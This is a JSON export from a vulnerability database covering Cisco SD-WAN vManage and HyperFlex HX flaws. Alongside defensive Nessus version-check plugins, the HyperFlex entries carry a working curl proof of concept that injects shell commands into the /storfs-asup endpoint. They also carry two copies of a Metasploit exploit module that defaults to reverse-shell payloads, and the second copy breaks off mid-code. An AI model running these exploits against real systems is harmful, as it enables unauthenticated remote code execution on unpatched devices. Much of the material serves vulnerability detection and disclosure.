"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1275", "CVE-2021-1468", "CVE-2021-1505", "CVE-2021-1506", "CVE-2021-1508"], "modified": "2021-05-17T00:00:00", "cpe": ["cpe:/a:cisco:sd-wan_vmanage", "cpe:/o:cisco:sd-wan_firmware"], "id": "CISCO-SA-SD-WAN-VMANAGE-4TBYNNHZ.NASL", "href": "https://www.tenable.com/plugins/nessus/149363", "sourceData": "#TRUSTED 452fcb0c1372c66e25b37216a6675773a42b025cc2764f8d26d7175b72cdedc1277dc555f104000e8bcf40330148e79a3eb9d12546c7f1322d3ff70ae50522cab7f1f212e7a3765e76c19a3e6744da50749fd919d9f5fe51e8dae6ef92cdb2a83375444533c425fe6144241e6f99b84ef8b3448f3f0e73e8f0660dc2145ffd41de8aee5b7041c0c21373cf9cd57ed6eb1e2d985ec2322aa41b34bc4ec5576bd2d052e5e138293003adb2df3ff6678b0c04a4b502ca98d94f4808c72b0b7cdc17077d5cc61504b7fa8390f8db8d26e6fe976954c8251bfe48d5d36d445d46729cda5d0d5bd1a68331b1b99550f41b0cf9ab96e2cbfc4c1b6e4e2839c5c7abae3e30ad16e0e104e3e5559a1543762e9209c648aaae8cdf64366a3cfaf37d53d3bd85c76c5c174edb4355655371daf3e58c6091607405a7b7a8731b568b52f7f8d1594b72545098ab0d2bfdefa5d64d88f35309787fa78f08395465dc348545d08fc3d3a9a2bebc93b241f5d6280db47e70a3b88b54794c114c09e59c98f8d733df179c1d993dce32127d7f2086de6e6a73e99d4bb7f1a040d7c6c2477bfa06d82b747dcbf62a0f518d3329b8f1b166b64d7fcd166e318b273fb55c533240094e012a0f5dee3180ac623e96eae40c3c513c28434f160ea8895c1c98ec23b264986aad817fa4e2c925bcd83e8ece66ac3e1f3932ca69d782efd6fc9b4e79a8fcfdb6\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149363);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/17\");\n\n script_cve_id(\n \"CVE-2021-1275\",\n \"CVE-2021-1468\",\n \"CVE-2021-1505\",\n \"CVE-2021-1506\",\n \"CVE-2021-1508\"\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28360\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28390\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28402\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvu28454\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-sd-wan-vmanage-4TbynnhZ\");\n\n script_name(english:\"Cisco SD-WAN vManage Software Vulnerabilities (cisco-sa-sd-wan-vmanage-4TbynnhZ)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco SD-WAN Viptela Software is affected by multiple vulnerabilities that\nallow an unauthenticated, remote attacker to execute arbitrary code or gain access to sensitive information, or allow an\nauthenticated, local attacker to gain escalated privileges or gain unauthorized access to the application. \n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-vmanage-4TbynnhZ\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?769d3f6f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28360\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28390\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvu28454\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvu28360, CSCvu28390, CSCvu28402, CSCvu28454\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 862, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:sd-wan_vmanage\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:sd-wan_firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_vedge_detect.nbin\");\n script_require_keys(\"Cisco/Viptela/Version\");\n\n exit(0);\n}\n\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco Viptela');\n\nif (tolower(product_info['model']) !~ \"vmanage\")\n audit(AUDIT_HOST_NOT, 'an affected model');\n\nvar vuln_ranges = [\n { 'min_ver' : '0.0', 'fix_ver' : '20.3.3' },\n { 'min_ver' : '20.4', 'fix_ver' : '20.4.1' },\n { 'min_ver' : '20.5', 'fix_ver' : '20.5.1' }\n];\n\nvar reporting = make_array(\n 'port' , 0,\n 'severity' , SECURITY_HOLE,\n 'bug_id' , 'CSCvu28360, CSCvu28390, CSCvu28402, CSCvu28454',\n 'version' , product_info['version'],\n 'disable_caveat', TRUE\n);\n\ncisco::check_and_report(\n product_info:product_info,\n vuln_ranges:vuln_ranges,\n reporting:reporting\n);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T14:48:49", "description": "The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection vulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T00:00:00", "type": "nessus", "title": "Cisco HyperFlex HX Command Injection Direct Check (cisco-sa-hyperflex-rce-TjjNrkpR)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2022-11-30T00:00:00", "cpe": ["cpe:/a:cisco:hyperflex_hx-series_software"], "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR-DC.NBIN", "href": "https://www.tenable.com/plugins/nessus/149979", "sourceData": "Binary data cisco-sa-hyperflex-rce-TjjNrkpR-dc.nbin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:48:54", "description": "The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection vulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected system.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-13T00:00:00", "type": "nessus", "title": "Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2022-01-21T00:00:00", "cpe": ["cpe:/a:cisco:hyperflex_hx-series_software"], "id": "CISCO-SA-HYPERFLEX-RCE-TJJNRKPR.NASL", "href": "https://www.tenable.com/plugins/nessus/149454", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149454);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/21\");\n\n script_cve_id(\"CVE-2021-1497\", \"CVE-2021-1498\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx36014\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx36019\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvx37435\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-hyperflex-rce-TjjNrkpR\");\n script_xref(name:\"IAVA\", value:\"2021-A-0237\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Cisco HyperFlex HX Command Injection Vulnerabilities (cisco-sa-hyperflex-rce-TjjNrkpR)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco HyperFlex HX installed on the remote host is affected by multiple command injection \nvulnerabilities. An unauthenticated, remote attacker can exploit these to execute arbitrary commands on an affected \nsystem.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c9228075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36014\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx36019\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx37435\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvx36014, CSCvx36019, CSCvx37435\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1497\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Cisco HyperFlex HX Data Platform Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(78);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:hyperflex_hx-series_software\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_hyperflex_web_api_detect.nbin\");\n script_require_keys(\"Host/OS/Cisco_HyperFlex_web_API\");\n script_require_ports(\"Services/www\", 80, 443);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'Cisco HyperFlex', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nvar constraints = [\n {'fixed_version':'4.0.2e'}, \n {'min_version':'4.5.0', 'fixed_version':'4.5.2a'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T10:24:58", "description": "# CVE-2021-1497 and/or CVE-2021-1498\n\nCommand injection in the `/storfs-asup` endpoint\u2019s `token` and `mode` parameters.\n\n## Patch\n\n```\n--- unpatched/web.xml\t2021-05-17 19:06:17.000000000 -0500\n+++ patched/web.xml\t2021-05-17 19:06:23.000000000 -0500\n@@ -69,17 +69,6 @@\n \t</servlet-mapping>\n\n \t<servlet>\n-\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n-\t\t<servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class>\n-\t\t<load-on-startup>1</load-on-startup>\n-\t</servlet>\n-\n-\t<servlet-mapping>\n-\t\t<servlet-name>Springpath Storfs ASUP</servlet-name>\n-\t\t<url-pattern>/storfs-asup/*</url-pattern>\n-\t</servlet-mapping>\n-\n-\t<servlet>\n \t\t<servlet-name>Springpath Upgrade Image Upload Service</servlet-name>\n \t\t<servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class>\n \t</servlet>\n```\n\n## Vulnerability\n\n```\n protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {\n String action = request.getParameter(\"action\");\n if (action == null) {\n String msg = \"Action for the servlet need be specified.\";\n writeErrorResponse(response, msg);\n return;\n }\n try {\n String token = request.getParameter(\"token\");\n StringBuilder cmd = new StringBuilder();\n cmd.append(\"exec /bin/storfs-asup \");\n cmd.append(token);\n String mode = request.getParameter(\"mode\");\n cmd.append(\" \");\n cmd.append(mode);\n cmd.append(\" > /dev/null\");\n logger.info(\"storfs-asup cmd to run : \" + cmd);\n ProcessBuilder pb = new ProcessBuilder(new String[] { \"/bin/bash\", \"-c\", cmd.toString() });\n logger.info(\"Starting the storfs-asup now: \");\n long startTime = System.currentTimeMillis();\n Process p = pb.start();\n InputStream errStream = p.getErrorStream();\n String errMsg = FileUtils.readToString(errStream);\n int exitCode = p.waitFor();\n long timeTaken = System.currentTimeMillis() - startTime;\n logger.info(\"storfs-asup command completed in (\" + timeTaken + \" ) milliseconds, with exit code (\" + exitCode + \") and error message: \" + errMsg);\n errStream.close();\n OutputStream outStream = p.getOutputStream();\n outStream.flush();\n outStream.close();\n if (exitCode != 0)\n throw new Exception(errMsg);\n } catch (IOException ex) {\n logger.error(\"Failed to generate asup: \" + ex);\n } catch (Exception ie) {\n logger.error(\"Failed to run the /bin/storfs-asup command.\");\n } finally {\n logger.info(\"Done executing asup command. \");\n }\n }\n```\n\n## PoC\n\n```\nwvu@kharak:~$ curl -v http://192.168.123.133/storfs-asup -d 'action=&token=`id`&mode=`id`'\n* Trying 192.168.123.133...\n* TCP_NODELAY set\n* Connected to 192.168.123.133 (192.168.123.133) port 80 (#0)\n> POST /storfs-asup HTTP/1.1\n> Host: 192.168.123.133\n> User-Agent: curl/7.64.1\n> Accept: */*\n> Content-Length: 28\n> Content-Type: application/x-www-form-urlencoded\n>\n* upload completely sent off: 28 out of 28 bytes\n< HTTP/1.1 200 OK\n< Server: nginx/1.8.1\n< Date: Tue, 18 May 2021 00:54:26 GMT\n< Content-Length: 0\n< Connection: keep-alive\n< Front-End-Https: on\n<\n* Connection #0 to host 192.168.123.133 left intact\n* Closing connection 0\nwvu@kharak:~$\n```\n\n## IOCs\n\n```\n==> /var/log/nginx/access.log <==\n192.168.123.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.1\" 200 0 \"-\" \"curl/7.64.1\"\n\n==> /var/log/springpath/stBootstrapGuiBackend.log <==\n2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now:\n2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command.\n2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command.\n\n==> /var/log/tomcat7/catalina.out <==\n2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null\n2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now:\n2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory\n2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command.\n2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command.\n\n==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <==\n127.0.0.1 - - [17/May/2021:17:54:26 -0700] \"POST /storfs-asup HTTP/1.0\" 200 -\n```", "cvss3": {}, "published": "2021-05-20T00:00:00", "type": "seebug", "title": "Cisco HyperFlex HX \u672a\u6388\u6743\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2021-1497 CVE-2021-1498\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-05-20T00:00:00", "id": "SSV:99255", "href": "https://www.seebug.org/vuldb/ssvid-99255", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-06-04T16:21:33", "description": "", "cvss3": {}, "published": "2021-06-04T00:00:00", "type": "packetstorm", "title": "Cisco HyperFlex HX Data Platform Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-1497", "CVE-2021-1498"], "modified": "2021-06-04T00:00:00", "id": "PACKETSTORM:162976", "href": "https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Cisco HyperFlex HX Data Platform Command Execution', \n'Description' => %q{ \nThis module exploits an unauthenticated command injection in Cisco \nHyperFlex HX Data Platform's /storfs-asup endpoint to execute shell \ncommands as the Tomcat user. \n}, \n'Author' => [ \n'Nikita Abramov', # Discovery \n'Mikhail Klyuchnikov', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer \n['CVE', '2021-1498'], # HyperFlex HX Data Platform \n['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'], \n['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'], \n['URL', 'https://twitter.com/ptswarm/status/1390300625129201664'] \n], \n'DisclosureDate' => '2021-05-05', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, # Privesc left as an exercise for the reader \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5]) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => %w[GET POST].sample, \n'uri' => normalize_uri(target_uri.path, 'storfs-asup') \n) \n \nreturn CheckCode::Unknown unless res \n \nunless res.code == 200 && \nres.body.include?('Action for the servlet need be specified.') \nreturn CheckCode::Safe \nend \n \nCheckCode::Vulnerable('Storfs ASUP servlet detected.') \nend \n \ndef exploit \nprint_status(\"Selected #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nprint_status(\"Executing command: #{cmd}\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'storfs-asup'), \n'vars_post' => { \n'action' => Faker::Hacker.verb, \n%w[token mode].sample => \"$(#{cmd})\" \n} \n}, datastore['CmdExecTimeout']) \n \nunless res \nprint_warning('Command execution timed out') \nreturn \nend \n \nunless res.code == 200 \nfail_with(Failure::PayloadFailed, 'Failed to execute command') \nend \n \nprint_good('Successfully executed command') \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162976/cisco_hyperflex_hx_data_platform_cmd_exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2021-12-22T01:23:55", "description": "This Metasploit module exploits an unauthenticated command injection in Cisco HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell commands as the Tomcat user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "zdt", "title": "Cisco HyperFlex HX Data Platform Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1498", "CVE-2021-1497"], "modified": "2021-06-04T00:00:00", "id": "1337DAY-ID-36357", "href": "https://0day.today/exploit/description/36357", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Cisco HyperFlex HX Data Platform Command Execution',\n 'Description' => %q{\n This module exploits an unauthenticated command injection in Cisco\n HyperFlex HX Data Platform's /storfs-asup endpoint to execute shell\n commands as the Tomcat user.\n },\n 'Author' => [\n 'Nikita Abramov', # Discovery\n 'Mikhail Klyuchnikov', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-1497'], # HyperFlex HX Data Platform Installer\n ['CVE', '2021-1498'], # HyperFlex HX Data Platform\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR'],\n ['URL', 'https://attackerkb.com/assessments/4f532147-b27b-4079-aed1-5cfdc402cf5c'],\n ['URL', 'https://twitter.com/ptswarm/status/1390300625129201664']\n ],\n 'DisclosureDate' => '2021-05-05',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Privesc left as an exercise for the reader\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => %w[GET POST].sample,\n 'uri' => normalize_uri(target_uri.path, 'storfs-asup')\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 &&\n res.body.include?('Action for the servlet need be specified.')\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable('Storfs ASUP servlet detected.')\n end\n\n def exploit\n print_status(\"Selected #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'storfs-asup'),\n 'vars_post' => {\n 'action' => Faker::Hacker.verb,\n %w[token mode].sample => \"$(#{cmd})\"\n }\n }, datastore['CmdExecTimeout'])\n\n unless res\n print_warning('Command execution timed out')\n return\n end\n\n unless res.code == 200\n 